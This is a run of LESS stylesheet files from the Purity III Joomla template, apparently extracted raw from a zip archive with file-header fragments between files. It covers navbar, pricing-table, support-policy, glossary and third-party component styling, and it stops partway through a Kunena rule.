    // Caret should match text color on hover
    > .dropdown > a:hover .caret,
    > .dropdown > a:focus .caret {
      border-top-color: @navbar-default-link-hover-color;
      border-bottom-color: @navbar-default-link-hover-color;
    }

    // Remove background color from open dropdown
    > .open > a {
      &,
      &:hover,
      &:focus {
        background-color: @navbar-default-link-active-bg;
        color: @navbar-default-link-active-color;
        @media screen and (min-width: @grid-float-breakpoint) {
          .box-shadow(inset 0 -2px 0 #fff);
        }
        // Caret
        .caret {
          border-top-color: @navbar-default-link-active-color;
          border-bottom-color: @navbar-default-link-active-color;
        }
      }
    }
    > .dropdown > a .caret {
      border-top-color: @navbar-default-link-color;
      border-bottom-color: @navbar-default-link-color;
    }


    @media (max-width: @grid-float-breakpoint) {
      // Dropdowns get custom display when collapsed
      .open .dropdown-menu {
        background: @navbar-default-border;

        > li {
          border-top-color: darken(@navbar-default-border,5%);
        }

        > li > a {
          color: @navbar-default-link-color;
          padding: 20px 20px 20px 30px;

          &:hover,
          &:focus {
            color: @navbar-default-link-hover-color;
            background-color: @navbar-default-link-hover-bg;
          }
        }
        > .active > a {
          &,
          &:hover,
          &:focus {
            color: @navbar-default-link-active-color;
            background-color: @navbar-default-link-active-bg;
          }
        }
        > .disabled > a {
          &,
          &:hover,
          &:focus {
            color: @navbar-default-link-disabled-color;
            background-color: @navbar-default-link-disabled-bg;
          }
        }
      }
    }


    // Level 2 dropdown-menu on Collapse Menu
    @media screen and (max-width: @grid-float-breakpoint) {
      .open .level2.dropdown-menu {
        background: darken(@navbar-default-border,5%);
        border-top: 1px solid darken(@navbar-default-border,10%);
        margin-top: 0;

        > li {
          border-top-color: darken(@navbar-default-border,10%);
        }

        > li > a {
          padding-left: 40px;
        }

      }
    }


  }


  // Links in navbars
  //
  // Add a class to ensure links outside the navbar nav are colored correctly.
  .navbar-link {
    color: @navbar-default-link-color;
    &:hover {
      color: @navbar-default-link-hover-color;
    }
  }

}



// -------------------------------------------------------
//  T3 MAIN MENU
// -------------------------------------------------------
.t3-mainnav {
  border: 0;
  border-bottom: 1px solid @navbar-default-border;
  margin-bottom: 0;
  border-radius: 0;

  > .container {
    // Set ralative Position on Breakpoint
    @media (min-width: @grid-float-breakpoint) {
      position: relative;
    }
  }

  // Navbar
  // -------
  .t3-navbar {
    padding-left: 0;
    padding-right: 0;
    float: left;
  }


  // Collapse Navbar
  // ---------------
  .t3-navbar-collapse {
    margin-top: @navbar-height;

    // Hide the generated navbar on breakpoint
    @media (min-width: @grid-float-breakpoint) {
      display: none !important;
    }

    // Navbar nav links
    // ----------------
    .navbar-nav {
      margin: 0 -@navbar-padding-horizontal;

      //font awesome
      li > a .fa {
        margin-right: 5px;
      }

      > li > a {
        border-top: 1px solid @navbar-default-border;
      }

      > li:first-child  > a {
        border-top: 0;
      }

      // Dropdown Menu
      .open .dropdown-menu {
        left: -1px;

        > li > a,
        .dropdown-header {
        }

        > li > a {
          // Link states
          &:hover,
          &:focus {
          }
        }

      }

      // Re-Align the caret on right
      .dropdown > a {
        .caret {
          position: absolute;
          top: 40%;
          right: @padding-base-horizontal;
        }
      }
    }

  // End Collapse Navbar
  }

// End
}
PKԜ�\!purity_iii/less/rtl/template.lessnu&1i�PKԜ�\�]��purity_iii/less/rtl/joomla.lessnu&1i�// ---------------------------------------------------------
// SMART SEARCH
// ---------------------------------------------------------

.off-canvas body > .autocompleter-choices {
  width: 0px;
  left: auto;
}
PKԜ�\����purity_iii/less/rtl/style.lessnu&1i�// RTL STYLES
// ------------------------------------------------------

// Article Images
// --------------
article img[align=left],
.img_caption.left,
.pull-left.item-image {
  margin: 0 @grid-gutter-width @t3-global-margin 0;
}

article img[align=right],
.img_caption.right,
.pull-right.item-image {
  margin: 0 0 @t3-global-margin @grid-gutter-width;
}

.languageswitcherload {
  ul {
    float: left;
  }
}PKԜ�\�g1��:�:&purity_iii/less/components-addons.lessnu&1i�/** 
 *------------------------------------------------------------------------------
 * @package       T3 Framework for Joomla!
 *------------------------------------------------------------------------------
 * @copyright     Copyright (C) 2004-2017 JoomlArt.com. All Rights Reserved.
 * @license       GNU General Public License version 2 or later; see LICENSE.txt
 * @authors       JoomlArt, JoomlaBamboo, (contribute to this project at github 
 *                & Google group to become co-author)
 * @Google group: https://groups.google.com/forum/#!forum/t3fw
 * @Link:         http://t3-framework.org 
 *------------------------------------------------------------------------------
 */
 

// --------------------------------------------------
// COMPONENT ADDONS
// --------------------------------------------------


// FEATURES INTRO
// --------------------------------------------
.features-intro {
  .t3-content {
    padding-top: 0;
    padding-bottom: 0;
  }
}

.row-feature {
  border-top: 1px solid @t3-border-color;
  padding: (@t3-global-padding * 2) 0;
  font-size: @t3-font-size-bigger;
  color: @gray;
  line-height: 1.5;

  // Row Feature in a Page Mass Head
  .page-masthead & {
    padding: (@t3-global-padding * 2) 0;
  }

  // Bigger padding Desktop
  @media screen and (min-width: @screen-md) {
    padding: (@t3-global-padding * 3) 0;
    // Row Feature in a Page Mass Head
    .page-masthead & {
      padding: (@t3-global-padding * 5) 0;
    }
  }

  // Heading
  h1, h2 , h3 {
    line-height: 1.15;
    color: @gray-dark;
  }

  h1 {
    margin-top: 0;
    margin-bottom: (@t3-global-margin * 3);
    font-weight: 300;
    // Bigger font on Tablet / Desktop
    @media screen and (min-width: @screen-sm) {
      font-size: @font-size-h1 * 2;
    }
  }

  h1 + p {
    margin-top: -((@t3-global-margin * 3) - 5px);
  }

  h2 {
    margin-top: 0;
    margin-bottom: @t3-global-margin / 2;
    // Bigger font on Tablet / Desktop
    @media screen and (min-width: @screen-sm) {
      font-size: @font-size-h1;
    }
  }

  h3 {
    margin-top: @t3-global-margin;
    margin-bottom: @t3-global-margin;
    // Bigger font on Tablet / Desktop
    @media screen and (min-width: @screen-sm) {
      font-size: @font-size-h3 * 1.15;
    }
  }

  h3 + p {
    margin-top: -(@t3-global-margin / 2);
  }


  // Row Content
  // ------------------------
  .feature-ct {
    width: 100%;
    padding-top: @t3-global-padding / 2;
  }

  // Content alignment Tablet / Desktop
  @media screen and (min-width: @screen-sm) {
    .pull-left.item-image + .feature-ct {
      width: 50%;
      float: right;
      padding-left: @t3-global-padding;
    }
    .pull-right.item-image + .feature-ct {
      width: 50%;
      float: left;
      padding-right: @t3-global-padding;
    }
  }


  // Generic Rows Styles
  // ------------------------
  &.text-center {
    text-align: center;
  }

  // Alternate
  &.row-feature-alt,
  &:nth-child(even)  {
    background: @gray-lightest;
  }

  // Primary
  &.row-feature-primary {
    background: @brand-primary;
    color: lighten(@brand-primary, 50%);
    h1, h2, h3 {
      color: @white;
    }
    .feature-ct, p {
      color: lighten(@brand-primary, 50%);
    }
    .btn-primary {
      border-color: #fff;
    }
  }

  &.row-feature-primary + .row-feature-primary {
    border-top: 1px solid darken(@brand-primary, 10%);
  }

  // Narrower
  .row-feature-narrow {
    padding-top: @t3-global-padding;
    padding-bottom: @t3-global-padding;
  }

  &:first-child {
    border-top: 0;
  }

 
  // Row image
  // ------------------------
  .item-image {
    width: 100%;
    float: none;
    margin-bottom: @t3-global-margin;
    img {
      max-width: 100%;
    }
  }

  // Image alignment Tablet / Desktop
  @media screen and (min-width: @screen-sm) {
    .pull-left.item-image,
    .pull-right.item-image {
      max-width: 50%;
      min-width: 25%;
      margin-bottom: 0;
    }
    .pull-left.item-image {
      float: left;
      text-align: left;
      padding-right: @t3-global-padding;

    }
    .pull-right.item-image {
      float: right;
      text-align: right;
      padding-left: @t3-global-padding;
    }
  }


  // Row title
  // ------------------------
  .page-header {
    border: 0;
    margin: 0 0 @t3-global-margin;
    padding: 0;
  }

  // Jumbotron
  .jumbotron {
    background: transparent;
    position: relative;
    margin-top: 0;
    margin-bottom: @t3-global-margin;
    padding-top: 0;
    padding-bottom: 0;
    text-align: center;

    // Bigger margin on Tablet / Desktop
    @media screen and (min-width: @screen-sm) {
      margin-bottom: @t3-global-margin * 3;
    }

  }

  // Jumbotron masshead
  .masthead {
  }


  // Gallery
  // -------------------------
  .gallery {
    .thumbnail {
      border: 0;
      padding: 0;
      a {
        display: block;
        border: 1px solid @t3-border-color;
        padding: 3px;
        .transition(border-color 0.2s ease-in);
        img {
          width: 100%;
          padding: 0;
        }
        // Hover states
        &:hover, &:focus, &:active {
          border-color: darken(@t3-border-color, 20%);
          img {
            opacity: .7;
          }
        }
      }
    }
  }

// End
}




// SUPPORT POLICY
// ---------------------------------------
.support-policy {

  // Layout
  // ------------------
  .row-support-policy {
    margin-bottom: @t3-global-margin;
  }


  // The Policy
  // -------------------
  .policy-item {
    margin-bottom: @t3-global-margin;
    border: 1px solid @t3-border-color;

    // Title
    .col-type {
      position: relative;
      height: 100px;
      border-bottom: 1px solid @t3-border-color;
      background: @gray-lightest;
      h3 {
        position: absolute;
        bottom: 10px;
        left: 20px;
      }
    }

    // Detail
    .col-detail {
      height: 200px;
      padding: @t3-global-padding;
    }

    // Level
    .col-level {
      height: 80px;
      background: @gray-dark;
      color: #fff;
      position: relative;

      .face,
      .count-up,
      > strong {
        height: 80px;
        line-height: 80px;
      }

      .level-info {
        width: 160px;
        position: absolute;
        left: 0;
        bottom: 0;
        // Face exprestion
        .face {
          background-image: url(../images/emoticons.png);
          background-repeat: no-repeat;
          background-color: rgba(0,0,0,.35);
          display: table-cell;
          width: 80px;
          border-right: 1px solid rgba(0,0,0,.2);
        }
        // Percent
        .count-up {
          width: 80px;
          border-right: 1px solid rgba(0,0,0,.2);
          background-color: rgba(0,0,0,.15);
          display: table-cell;
          vertical-align: middle;
          text-align: center;
          font-size: @font-size-large;
          font-weight: bold;
        }
      }

      strong {
        width: 100%;  
        color: @white;
        display: block;
        float: left;
        font-weight: bold;
        padding-left: 180px;
        font-size: @font-size-large;
      }

      // Levels
      &.level-1 {
        strong { background: @green; }
        .face { background-position: 0px 0px; }
      }

      &.level-2 {
        strong { background: darken(@green,10%); }
        .face { background-position: 0px -80px; }
      }

      &.level-3 {
        strong { background: @yellow; }
        .face { background-position: 0px -160px; }
        }

      &.level-4 {
        strong { background: darken(@yellow,10%); }
        .face { background-position: 0px -240px; }
      }

      &.level-5 {
        strong { background-color: @orange; }
        .face { background-position: 0px -320px; }
      }

      &.level-6 {
        strong { background: @red; }
        .face { background-position: 0px -400px; }
      }

    }
  // End Policy Item
  }


  // Row hover
  // --------------------------------
  &:hover {
    background: @white;
    border-color: @gray-lighter;

    .level-info .face {
      top: -70px;
    }

    .level-info .count-up {
      bottom: 0;
    }
  }

  // Style 2

  &.style2 {
    margin-bottom: @t3-global-margin * 3;
  }

  .row-heading {
    background: @gray-dark;
    color: @white;
    overflow: hidden;
    @media screen and (min-width: @screen-sm) {
      display: table;
      width: 100%;
    }

    & > div {
      border-right: 1px solid lighten(@gray-dark, 10%);
      font-size: @t3-font-size-smaller;
      font-weight: bold;
      padding: @t3-global-padding;

      // Bigger margin on Tablet / Desktop
      @media screen and (min-width: @screen-sm) {
        font-size: @t3-font-size-big;
        display: table-cell;
      }
    }

  }

  .row-body {
    border-left: 1px solid @t3-border-color;
    margin-bottom: @t3-global-margin;
    @media screen and (min-width: @screen-sm) {
      display: table;
      width: 100%;
      margin-bottom: 0;
    }

    & > div {
      border-right: 1px solid @t3-border-color;
      border-bottom: 1px solid @t3-border-color;
      padding: (@t3-global-padding / 2) @t3-global-padding;
      vertical-align: middle;
      // Bigger margin on Tablet / Desktop
      @media screen and (min-width: @screen-sm) {
        display: table-cell;
        float: none;
      }
    }

    .col-type {
      background: @gray-dark;
      color: @white;
      font-size: @t3-font-size-bigger;
      font-weight: bold;
      // Bigger margin on Tablet / Desktop
      @media screen and (min-width: @screen-sm) {
        background: transparent;
        color: @text-color;
      }
    }

    .col-level {
      font-size: @t3-font-size-bigger * 2;
      text-align: center;
    }

    .col-status {
      border-bottom: 0;
      .face {
        background-image: url(../images/emoticons.png);
        background-repeat: no-repeat;
        display: block;
        height: 80px;
        margin: 0 auto;
        width: 80px;
      }

      strong {
        color: @white;
        display: block;
        padding: 3px 0;
        text-align: center;
      }
    }

    &.level-1 .col-status {
      background: @green;

      .face {
        background-position: 0px 0px;
      }
    }

    &.level-2 .col-status {
      background: lighten(@green,4%);

      .face {
        background-position: 0px -80px;
      }
    }

    &.level-3 .col-status {
      background: lighten(@green,8%);
      .face {
        background-position: 0px -160px;
      }
    }

    &.level-4 .col-status {
      background: lighten(@green,12%);
      .face {
        background-position: 0px -240px;
      }
    }

    &.level-5 .col-status {
      background: lighten(@green,16%);
      .face {
        background-position: 0px -320px;
      }
    }

    &.level-6 .col-status {
      background: lighten(@green,20%);
      .face {
        background-position: 0px -400px;
      }
    }
  }

  .row-alt {
    background: @gray-lightest;
  }

  .support-yes {
    color: @green;
  }

  .support-no {
    color: darken(@gray-lighter, 5%);
  }

// End
}


// PRICING TABLE
// ---------------------------------------
.pricing-table {
  padding-top: @t3-global-padding * 2;
  padding-bottom: @t3-global-padding * 5;

  .col {
    margin-bottom: @t3-global-margin * 2;

    @media (min-width: @screen-md) {
      margin-bottom: 0;
    }

    // Remove padding of the column
    // ----------------------------
    &.no-padding {
      @media (min-width: 768px) {
        padding: 0;
      }      
    }

    &.shadow {
      @media (min-width: 768px) {
        box-shadow: 0 0 0 5px rgba(0, 0, 0, 0.2);
      }
    }


    // Typography's Pricing table
    // --------------------------
    .big-number {
      display: inline-block;
      font-size: @font-size-base * 5;

      sup {
        font-size: @font-size-base * 2;
        top: -1em;
      }
    }

    .btn {
      font-size: @font-size-base + 6;
      padding: (@t3-global-padding / 2) @t3-global-padding;
    }


    // Header of column
    // ----------------
    .col-header {
      background: @gray;
      color: @white;
      padding: (@t3-global-padding / 2) @t3-global-padding;
    }


    // Body of column
    // --------------
    ul {
      border: 1px solid @gray-lighter;
      border-bottom: 0;
      list-style: none;
      margin: 0;
      padding: 0;

      li {
        border-bottom: 1px solid @gray-lighter;
        font-size: @font-size-base + 2;
        padding: (@t3-global-padding / 2) @t3-global-padding;
        text-align: center;

        &.row1 {
          background: @gray-lightest;
        }

        i {
          color: @green;
          font-size: @font-size-base + 4;
        }

        &.no i {
          color: @red;
        }


        &.no {
          color: @gray-light;
          text-decoration: line-through;
        }
      }
    }


    // Footer of column
    // ----------------
    .col-footer {
      background: @gray-lighter;
      border: 1px solid darken(@gray-lighter, 10%);
      padding: @t3-global-padding;
    }

  }

  
  // Feature column
  // --------------
  .col-feature {
    z-index: 200;

    // Larger margin on Tablet / Desktop
    @media screen and (min-width: @screen-md) {
      margin-top: -@t3-global-margin;
    }   

    .col-header {
      background: @brand-primary;
      padding: ((@t3-global-padding / 2) + (@t3-global-margin / 2)) @t3-global-padding;
    }
  }


  // PRICING TABLE ( Style 2 )
  // -------------------------
  &.style2 {

    // First column
    .col:first-child {
      .col-header {
        border-radius: 5px 0 0 0;
      }

      .col-footer {
        border-radius: 0 0 0 5px;
      }
    }

    // Last column
    .col:last-child {
      .col-header {
        border-radius: 0 5px 0 0;
      }

      .col-footer {
        border-radius: 0 0 5px 0;
      }
    }

    .col-feature {
      border-radius: 5px;

      .col-header {
        border-radius: 5px 5px 0 0;
      }

      .col-footer {
        border-radius: 0 0 5px 5px;
      }
    }

  }

}


// OUR TEAM
// ---------------------------------------
.our-team {
  .lead {
    margin-bottom: @t3-global-margin * 3;
  }

  .thumbnail {
    text-align: center;
    border: 0;
    padding: 0 @t3-global-padding;

    .caption {
      padding-bottom: @t3-global-padding;
    }

    h3 {
      margin-bottom: 5px;
    }

    .btn {
      border-radius: 50%;
      height: 32px;
      line-height: 32px;
      margin: 0 2px;
      padding: 0;
      text-align: center;
      width: 32px;

      &:hover {
        background: @brand-primary;
        border-color: @brand-primary;
        color: @white;
      }
    }
  }

  
}


// MISC
// --------------------------------------------
.control-group .controls script + .row-fluid {
  margin-left: 0;

  + .row-fluid {
    margin-left: 0;
  }
}

// Video Wrapper
// -------------
// Use to wrap the Video and make it responsive
.video-wrapper {
  position: relative;
  padding-bottom: 51%;
  padding-top: 30px;
  height: 0;
  // The video
  iframe {
    position: absolute;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
  }
}PKԜ�\��d���,purity_iii/less/themes/orange/variables.lessnu&1i�/** 
 *------------------------------------------------------------------------------
 * @package       T3 Framework for Joomla!
 *------------------------------------------------------------------------------
 * @copyright     Copyright (C) 2004-2017 JoomlArt.com. All Rights Reserved.
 * @license       GNU General Public License version 2 or later; see LICENSE.txt
 * @authors       JoomlArt, JoomlaBamboo, (contribute to this project at github 
 *                & Google group to become co-author)
 * @Google group: https://groups.google.com/forum/#!forum/t3fw
 * @Link:         http://t3-framework.org 
 *------------------------------------------------------------------------------
 */


// Brand colors
// -------------------------
@brand-primary:                 @orange;


// Scaffolding
// -------------------------
@body-bg:                 @white;
@text-color:              @gray-dark;


// Links
// -------------------------
@link-color:              @brand-primary;PKԜ�\�vSA��+purity_iii/less/themes/orange/template.lessnu&1i�/** 
 *------------------------------------------------------------------------------
 * @package       T3 Framework for Joomla!
 *------------------------------------------------------------------------------
 * @copyright     Copyright (C) 2004-2017 JoomlArt.com. All Rights Reserved.
 * @license       GNU General Public License version 2 or later; see LICENSE.txt
 * @authors       JoomlArt, JoomlaBamboo, (contribute to this project at github 
 *                & Google group to become co-author)
 * @Google group: https://groups.google.com/forum/#!forum/t3fw
 * @Link:         http://t3-framework.org 
 *------------------------------------------------------------------------------
 */
PKԜ�\���3purity_iii/less/themes/orange/variables-custom.lessnu&1i�
PKԜ�\F�_)purity_iii/less/themes/red/variables.lessnu&1i�/** 
 *------------------------------------------------------------------------------
 * @package       T3 Framework for Joomla!
 *------------------------------------------------------------------------------
 * @copyright     Copyright (C) 2004-2017 JoomlArt.com. All Rights Reserved.
 * @license       GNU General Public License version 2 or later; see LICENSE.txt
 * @authors       JoomlArt, JoomlaBamboo, (contribute to this project at github 
 *                & Google group to become co-author)
 * @Google group: https://groups.google.com/forum/#!forum/t3fw
 * @Link:         http://t3-framework.org 
 *------------------------------------------------------------------------------
 */


// Brand colors
// -------------------------
@brand-primary:           @red;PKԜ�\0purity_iii/less/themes/red/variables-custom.lessnu&1i�PKԜ�\������(purity_iii/less/themes/red/template.lessnu&1i�/** 
 *------------------------------------------------------------------------------
 * @package       T3 Framework for Joomla!
 *------------------------------------------------------------------------------
 * @copyright     Copyright (C) 2004-2017 JoomlArt.com. All Rights Reserved.
 * @license       GNU General Public License version 2 or later; see LICENSE.txt
 * @authors       JoomlArt, JoomlaBamboo, (contribute to this project at github 
 *                & Google group to become co-author)
 * @Google group: https://groups.google.com/forum/#!forum/t3fw
 * @Link:         http://t3-framework.org 
 *------------------------------------------------------------------------------
 */

PKԜ�\���SS+purity_iii/less/extras/layout_glossary.lessnu&1i�/**
 *------------------------------------------------------------------------------
 * @package       T3 Framework for Joomla!
 *------------------------------------------------------------------------------
 * @copyright     Copyright (C) 2004-2017 JoomlArt.com. All Rights Reserved.
 * @license       GNU General Public License version 2 or later; see LICENSE.txt
 * @authors       JoomlArt, JoomlaBamboo, (contribute to this project at github
 *                & Google group to become co-author)
 * @Google group: https://groups.google.com/forum/#!forum/t3fw
 * @Link:         http://t3-framework.org
 *------------------------------------------------------------------------------
 */
@import "../vars.less";

// ---------------------------------------------------------
// GLOSSARY LAYOUT
// ---------------------------------------------------------

// NAVIGATION
// -----------------------------------
.glossary-nav {
  position: relative;
  z-index: 10;
  margin-bottom: @t3-global-margin * 2;

  nav {
    padding: 0;

    &.affix {
      top: auto;
      position: relative;
    }

    .nav-pills {
      background: #fff;

      > li {
        display: block;
        float: left;
        margin: 0 1px 10px 0;
      }
      > li > a {
        background: @gray-dark;
        color: @gray-lighter;
        font-size: @font-size-large;
        font-weight: 600;
        line-height: normal;
        padding: 0;
        width: 50px;
        height: 50px;
        line-height: 50px;
        text-align: center;
        text-transform: uppercase;
        // Link states
        &:hover, &:active, &:focus {
          background: @brand-primary;
          color: #fff;
        }
      }
    }
  // End nav
  }

//End
}

// Glossay Navigation has different style on Desktop
@media screen and (min-width: @grid-float-breakpoint) {
  .glossary-nav {
    nav {
      &.affix {
        top: 57px;
        position: fixed;
      }
      .nav-pills {
        > li > a {
          font-size: @font-size-h3;
        }
      }
    // End nav
    }
  //End
  }
}




// GLOSSARY ITEMS
// -----------------------------------
.glossary-items {
}

// Item
// ---------------------
.glossary-group {
  margin-bottom: @t3-global-margin * 2;
  position: relative;
  a[name] {
    position: absolute;
    top: -120px;
  }
}

// Title
.glossary-group-title {
  background: @gray-lightest;
  color: @gray-darker;
  font-weight: 600;
  font-size: @font-size-h2;
  margin: 0 0 @t3-global-margin;
  padding: 15px;
  text-transform: uppercase;
}

// The item
.glossary-group-items {
  ul {
    padding: 0;
    margin: 0;
    > li {
      list-style: none;
      padding: 0;
    }
    > li > a {
      color: @text-color;
      display: block;
      font-size: @font-size-large;
      padding: 5px 15px;
      // Link states
      &:hover, &:active, &:focus {
        color: @brand-primary;
        text-decoration: none;
      }
    }
  }
}


// GLOSSARY DETAIL MODAL
// -----------------------------------
#glossary-detail {
}
PKԜ�\WazJJ+purity_iii/less/extras/com_easydiscuss.lessnu&1i�@import "../vars.less";

// ---------------------------------------------------------
// EASYDISCUSS COMPATIBLITY
// ---------------------------------------------------------

#discuss-wrapper {

  .nav-collapse.collapse {
    display: block;

    .modal-body .row-fluid {
      margin-left: 0;
      margin-right: 0;
    }
  }

}PKԜ�\q4|���+purity_iii/less/extras/com_joomprofile.lessnu&1i�@import "../vars.less";

// ---------------------------------------------------------
// PROFILE PAGE
// ---------------------------------------------------------

.com_joomprofile {

	  // Avatar
  // --------------
	
	#f90pro {
		.f90pro-wrapper {
			.f90pro-avtar {
				img {
					width: 100%;
				}
			}
			#f90pro-detail {
				.f90pro-left {
					h3 {
						font-size: 18px;
						line-height: 1.5;
					}
				}
			}
		}
	}

}PKԜ�\��_��)purity_iii/less/extras/com_community.lessnu&1i�@import "../vars.less";

// ---------------------------------------------------------
// JOMSOCIAL COMPATIBLITY
// ---------------------------------------------------------

.com_community #community-wrap {

  label,
  .form-field {
    input {
      display: inline-block;
      margin-top: 0;
      vertical-align: middle;
    }
  }

  .row-fluid.hero-area {
    margin: 0;
  }

  // FRONT PAGE
  // ---------------------------------------------------------

  // Guest
  .cGuest .row-fluid.hero-area {
    margin-left: 0;
    margin-right: 0;
  }

  .js_dropDownMaster dt,
  .js_dropDownParent li > a {
    height: 28px;
  }

  .joms-select {
    box-shadow: none;
  }
  // Toolbar
  // ----------------------------------
  .js-toolbar {
    .navbar-inner {
      min-height: 40px;
    }

    .nav-collapse {
      display: block;
    }

    .nav > li > a {
      height: 38px;
      line-height: 25px;
    }

    .dropdown-menu > li {
      border: 0;
    }
  }

  .cStream-Content {
    .row-fluid {
      margin-left: 0;
      margin-right: 0;
    }
  }

  .joms-postbox-input .inputbox {
    box-shadow: none;
  }

  .joms-postbox-input .input-status {
    box-shadow: none;
    padding: @t3-global-padding / 2;
    overflow-y: auto;
    min-height: 160px !important;
  }
	
	.joms-postbox-input {
		overflow-y: scroll !important;
	}
	
	.joms-postbox-event {
		.joms-postbox-dropdown {
			.picker__select--month, .picker__select--year {
				display: inline-block;
			}
		}
	}

  // PROFILE PAGE PAGE
  // ---------------------------------------------------------
  .cProfile-Preferences {

    .js_dropDownMaster dt,
    .js_dropDownParent li > a {
      height: 26px;
      line-height: 20px;
    }

    label input {
      display: inline-block;
      margin-top: 0;
      vertical-align: middle;
    }
  }

  // FRIENDS PAGE
  // ---------------------------------------------------------

  // Search
  // -----------------------------
  .cSearch {
    .label-checkbox {
      input {
        display: inline-block;
        margin-top: 0;
        vertical-align: middle;
      }
    }
  }

  // Advand search
  // -----------------------------
  .advance-search {
    label {
      input {
        display: inline-block;
        margin-top: 0;
        vertical-align: middle;
      }
    }
  }

  // GROUP CREATE
  // ---------------------------------------------------------
  .cGroups-Create {
    label {
      input {
        display: inline-block;
        margin-top: 0;
        vertical-align: middle;
      }
    }
  }

  // Event Page
  // ---------------------------------------------------------
  .joms-page {
    .joms-form__group {

      select,
      textarea,
      input[type="text"],
      input[type="password"],
      input[type="datetime"],
      input[type="datetime-local"],
      input[type="date"],
      input[type="month"],
      input[type="time"],
      input[type="week"],
      input[type="number"],
      input[type="email"],
      input[type="url"],
      input[type="search"],
      input[type="tel"],
      input[type="color"],
      .inputbox {
        display: inline-block;
      }

      .joms-button--privacy {
        margin-right: 15px;
      }

      .joms-checkbox {
        input {
          margin-top: 8px;
        }
      }

    }
  }
  .jomsocial {
    .joms-body {
      .joms-focus__header__actions--desktop {
        a {
          font-size: 2.5rem;
        }
        .joms-icon {
          width: 24px;
          height: 24px;
        }
      }
      a.joms-button--viewed.nolink {
        span {
          margin: 0;
          padding-left: 15px;
        }
      }
    }
  }
}

.picker {
  background: green !important;
  .picker__box {
    .picker__header {
      display: flex;

      .picker__select--month {
        margin-left: @t3-global-padding;
      }
    }
  }
}
PKԜ�\�fl"j"j&purity_iii/less/extras/com_kunena.lessnu&1i�@import "../vars.less";

// ---------------------------------------------------------
// KUNENA COMPATIBLITY
// ---------------------------------------------------------

#kunena.layout {
  // Button
  .btn-group .dropdown-menu {
    background: @white;
    border-color: darken(@gray-lighter, 10%);

    li {
      border-top: 1px solid darken(@gray-lighter, 10%);

      a {
        color: @gray-dark;

        &:hover {
          background-color: @gray-lighter;
        }
      }
    }

    li:empty {
      display: none;
    }
  }

  input[type="checkbox"] {
    height: auto;
  }


  // NAVIGATION BAR
  .navbar {
    background: transparent;
    border: 0;
    border-bottom: 3px solid @brand-primary;
    border-radius: 0;
    min-height: 0;

    .nav {
      margin-bottom: 0;
      width: auto;

      > li {
        margin-right: 3px;
        margin-left: 0;

        > a {
          background-color: @gray-dark;
          border-radius: 2px 2px 0 0;
          color: @white;
          font-weight: 400;
          line-height: @line-height-base;
          padding: (@t3-global-padding / 4) (@t3-global-padding / 2);
          text-transform: none;

          &:hover, &:focus, &:active {
            background-color: @gray-darker;
            box-shadow: none;
          }
        }

        // Active
        &.active a {
          background-color: @brand-primary;
          box-shadow: none;
        }
      }
    }

    // Nav Collapse
    @media (max-width: @screen-md-max) {
      .navbar-nav.pull-left {
        > div {
          padding-top: 10px;
        }

        .btn {
          background: @brand-primary;
          color: @white;
          text-align: center;
          text-decoration: none;
        }

        .knav-collapse {
          background: @white;
          display: none;
          padding: 0;
          position: absolute;
          width: 100%;
          z-index: 10;

          &.in {
            display: block;
          }

          .navbar-nav {
            border: 1px solid @t3-border-color;
            display: block;

            li {
              background: @white;
              border: 0;
              margin-right: 0;

              a {
                background: @white;
                color: @gray-dark;

                &:hover,&:focus,&:active {
                  color: @brand-primary;
                }
              }

              &.active {
                a {
                  color: @brand-primary;
                }
              }

              + li {
                border-top: 1px solid @t3-border-color
              }
            }
          }
        }
      }
    }
    
    // Mobile user
    .mobile-user {
      border-radius: 0;
      color: @text-color;
      margin-right: 0;
      margin-top: 0!important;
      padding: 0;

      .dropdown-toggle {
        background-color: transparent;
        border-radius: 0;
        color: @text-color;
        padding: (@t3-global-padding / 4) (@t3-global-padding / 2);
        line-height: 20px;

        &:hover, &:focus, &:active {
          background-color: transparent;
        }

        img {
          box-shadow: none;
          height: 17px;
          width: 17px;
        }
      }

      // Menu Detail
      .dropdown-menu {
        background: @white;
        border: 1px solid @t3-border-color;
        padding: @t3-global-padding;
        min-width: 270px;
        left: auto;
        right: 0;

        // Form
        .form-group {
          > div {
            + div {
              margin-top: @t3-global-margin / 2;
            }
          }
        }

        // Form Login
        &#userdropdownlogin {
          .form-signin {
            padding: 0;

            .input-group {
              input {
                width: 100%;
              }
            }

            // Icon Avatar
            .thumbnail {
              border: 1px solid @t3-border-color;
              line-height: 50px;
              height: 50px;
              width: 50px;

              .glyphicon {
                font-size: @font-size-base;
                margin: 0;
              }
            }

            .fa-big {
              color: @gray;
              margin: 0;
            }

            // Link More
            .list-unstyled {
              li {
                font-size: @t3-font-size-smaller - 1;
              }
            }
          }
        }

        select, textarea, input[type="text"], input[type="password"], 
        input[type="datetime"], input[type="datetime-local"], 
        input[type="date"], input[type="month"], input[type="time"], 
        input[type="week"], input[type="number"], input[type="email"], 
        input[type="url"], input[type="search"], 
        input[type="tel"], input[type="color"], .inputbox {
          width: auto;
          display: inline-block;
        }

        // Form Logout
        .divider {
          background: @gray-lighter;
          height: 1px;
          margin: @t3-global-margin / 2 0;
        }

        .btn-link {
          color: @gray;

          &:hover,&:focus,&:active {
            color: @brand-primary;
          }
        }

        .kavatar {
          max-width: 60px;
        }

        #status-form {
          padding: 0;

          label {
            border: 0;
            padding: 0;
            margin: 0;
          }

          a.btn {
            border: 0;
            padding: 0;
            margin-bottom: @t3-global-margin / 4;
          }
        }

        .fa {
          margin-right: 5px;
        } 

        a.btn {
          border: 0;
          padding: 0;
        }

        #logout-form {
          padding: 0;

          .btn {
            border: 0;
            margin: 0;
            padding: 0;
          }
        }

        // Remove click status
        @media (max-width: @screen-md-max) {
          a[data-target="#statusTextModal"] {
            pointer-events: none;
          }
        }
      }

      .list-unstyled {
        li + li {
          margin-top: @t3-global-margin / 4;
        }
      }

      #nav-menu.dropdown-menu {
        left: auto;
        right: 0;
        width: 250px;

        a {
          color: @text-color;
          &:hover, &:focus, &:active {
            color: @link-hover-color;
          }
        }

        #status-form {
          padding: 0 @t3-global-padding / 2;

          & > div {
            border: 1px solid @t3-border-color;
            border-radius: 3px;
            display: inline-block;
            margin-bottom: 5px;

            .btn {
              font-size: @font-size-small;
              padding: 0 5px 2px;
              text-transform: none;
            }
          }
        }

        .btn {
          padding-top: 0;
          padding-bottom: 0;
        }
      }
    }
  }

  #jumpto {
    margin-bottom: @t3-global-margin;
  }

  // FRONT-END
  // -----------------------

  // Global Style
  .table > thead > tr > th,
  .table > tbody > tr > th,
  .table > tfoot > tr > th,
  .table > thead > tr > td,
